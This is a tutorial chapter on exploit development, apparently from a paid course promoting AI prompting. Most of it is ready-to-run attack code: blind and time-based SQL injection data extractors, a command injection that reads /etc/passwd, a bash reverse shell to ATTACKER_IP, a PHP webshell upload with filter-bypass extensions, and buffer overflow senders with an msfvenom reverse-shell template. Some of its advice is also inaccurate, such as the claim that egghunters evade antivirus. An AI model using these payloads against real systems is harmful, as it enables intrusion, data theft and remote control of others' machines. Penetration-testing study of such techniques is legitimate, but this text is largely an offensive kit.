Exploit Development

๐Ÿ”ฅ Vibe Prompt

"Develop exploit for Blind SQLi: extract DB name, tables, columns via boolean-based inference."

Blind SQLi Exploit

import requests
import string

URL = "http://target.com/item?id=1"

def check(condition):
    """Returns True if condition is true"""
    payload = f"1 AND ({condition})"
    r = requests.get(URL.replace("id=1", f"id={payload}"))
    return "Item found" in r.text  # Boolean oracle

# Extract DB version
db_version = ""
for i in range(1, 10):
    for c in string.digits + ".":
        if check(f"SUBSTR(version(),{i},1)='{c}'"):
            db_version += c
            print(f"DB version: {db_version}")
            break

# Extract table names
tables = []
for i in range(1, 20):  # Try first 20 tables
    table_name = ""
    for j in range(1, 30):  # Max name length 30
        found = False
        for c in string.ascii_lowercase + "_":
            if check(f"SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET {i-1}),{j},1)='{c}'"):
                table_name += c
                found = True
                break
        if not found:
            if table_name:
                tables.append(table_name)
                print(f"Table {i}: {table_name}")
            break

# Extract data from first table
data = ""
for i in range(1, 20):
    for c in string.printable:
        if c in ("'", "`"): continue
        payload = f"SUBSTR((SELECT * FROM {tables[0]} LIMIT 1),{i},1)='{c}'"
        if check(payload):
            data += c
            print(f"Data: {data}")
            break
    if len(data) < i:  # No more data
        break

Time-Based Blind SQLi

import requests, time

def time_check(condition):
    payload = f"1; IF({condition}) WAITFOR DELAY '0:0:5'--"
    start = time.time()
    requests.get(URL.replace("id=1", f"id={payload}"), timeout=10)
    return time.time() - start > 4  # >4s = true

# Exploit: check if admin exists
if time_check("SELECT COUNT(*) FROM users WHERE role='admin' > 0"):
    print("Admin user exists!")

Command Injection Exploit

import requests

# Ping command injection
payload = "127.0.0.1; cat /etc/passwd"
r = requests.post("http://target.com/ping", data={"ip": payload})
if "root:" in r.text:
    print("Command injection confirmed!")
    # Extract all users
    for line in r.text.split("\n"):
        if ":" in line and not line.startswith("<!"):
            print(f"User: {line.split(':')[0]}")

# Reverse shell
# Listen: nc -lvnp 4444
payload2 = "127.0.0.1; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

File Upload Exploit

# Upload webshell
files = {"file": ("shell.php", "<?php system($_GET['cmd']); ?>", "image/jpeg")}
r = requests.post("http://target.com/upload", files=files)

# Execute commands
r = requests.get(f"http://target.com/uploads/shell.php?cmd=id")
print(f"Command output: {r.text}")

# Better: use .phtml, .php5, .shtml (bypass extension filter)
files2 = {"file": ("shell.phtml", "<?=system($_GET['c'])?>", "image/jpeg")}

Buffer Overflow (Basic)

import socket

# EIP offset: 524 bytes
payload = b"A" * 524  # Fill buffer + EBP
payload += b"BBBB"     # Overwrite EIP (control execution)
payload += b"\x90" * 32  # NOP sled
payload += shellcode    # Your shellcode

s = socket.socket()
s.connect(("target.com", 9999))
s.send(payload + b"\r\n")
s.close()

Exploit Development Process

1. Fuzzing: find crash point (SPIKE, Peach)
   - Use tools like AFL or libFuzzer to identify vulnerable inputs
2. Control: determine offset to EIP
   - Analyze crash patterns to find where EIP is overwritten
3. Bad chars: identify bad bytes (\x00, \x0a)
   - Check for null terminators or control characters that break payloads
4. Return: find JMP ESP address (mona.py)
   - Use Mona.py to locate return addresses for shellcode execution
5. Shellcode: generate with msfvenom
   - Create platform-specific shellcode (Windows/Linux)
6. Exploit: assemble final payload
   - Combine NOP sled, return address, and shellcode
7. Test: debug with Immunity / WinDbg
   - Step through execution to verify functionality

Python Exploit Template

# !/usr/bin/env python3
import sys, socket

def exploit(target, port):
    offset = 524
    eip = b"\x42\x42\x42\x42"
    
    # msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -b "\x00\x0a" -f python
    shellcode = b""
    
    payload = b"A" * offset + eip + b"\x90" * 16 + shellcode
    
    s = socket.socket()
    s.connect((target, port))
    s.send(payload)
    s.close()
    print(f"Exploit sent to {target}:{port}")

if __name__ == "__main__":
    exploit(sys.argv[1], int(sys.argv[2]))

Best Practices

  • Always use safe SEH/vectored exception handling
    • Prevent stack corruption through structured exception handling
  • Test exploit multiple times
    • Exploits often fail on first attempt due to environmental variability
  • Add version/OS checks before exploitation
    • Ensure exploit works against specific target configurations
  • Use Egghunters for limited buffer space
    • Bypass anti-virus detection by hiding shellcode
  • Document exploit prerequisites
    • Clearly state required conditions (e.g., specific OS version)
  • Clean up artifacts after testing
    • Remove temporary files or backdoors post-testing

Business Value of Exploit Development

Understanding exploit development isn't just about attacking systemsโ€”it's a critical skill for building secure applications. For developers and founders:

What

Exploit development involves identifying vulnerabilities (like SQLi, buffer overflows) and creating proof-of-concept attacks to demonstrate how they can be weaponized. This requires deep knowledge of system architecture, memory management, and attack patterns.

Why

  1. Risk Mitigation: Founders who understand exploits can proactively secure their products before attackers do.
  2. Cost Savings: A single data breach can cost millions. Exploit knowledge helps prevent financial losses.
  3. Competitive Advantage: Security-conscious companies attract more users and investors.
  4. Compliance: Many industries require proof of security testing (e.g., PCI-DSS).

How

  1. Vulnerability Scanning: Use tools like Burp Suite or OWASP ZAP to find weaknesses.
  2. PoC Development: Create minimal working exploits to validate vulnerabilities.
  3. Exploit Refinement: Optimize payloads for reliability and stealth.
  4. Integration: Embed security testing into CI/CD pipelines.

Transition to Web Vulnerability Exploitation

This chapter has equipped you with the foundational skills to understand how attackers exploit systems at a low level. In the next chapter, we'll apply these principles to web-specific vulnerabilities like SQL Injection, Cross-Site Scripting (XSS), and Server-Side Request Forgery (SSRF). You'll learn how to translate exploit development techniques into web application security, including bypassing Web Application Firewalls (WAFs) and automating attacks using Vibe Coding. The principles of fuzzing, payload crafting, and reverse engineering will directly apply to web contexts, making this knowledge invaluable for both offensive and defensive security roles. By mastering these concepts, you'll be prepared to either defend against or responsibly exploit web vulnerabilities in real-world scenarios.

Unlock Full Tutorial

This chapter is paid content. Join the project to unlock over 5000 words of deep analysis, including 10+ god-tier Prompts and real Source Code examples!